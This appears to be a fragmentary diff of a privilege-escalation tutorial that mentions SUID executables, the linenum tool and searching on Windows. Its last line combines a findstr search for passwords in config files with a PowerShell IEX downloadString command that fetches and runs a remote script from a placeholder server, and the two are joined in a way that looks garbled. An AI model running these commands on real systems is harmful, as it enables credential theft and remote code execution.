 SUID executables.
 There is a tool named linenum but it's too verbose

 and I like to search for things manually.

-(usually it has administrative user and password information there),
+administrative user and password information there), installed software

-Windows, most of the time the way of escalating privileges
+to Windows, most of the time, the way of escalating privileges is

 > findstr /si password *.xml *.ini *.txt *.config 2>nul > IEX(New-Object Net.WebClient).downloadString('http://server/script.ps1')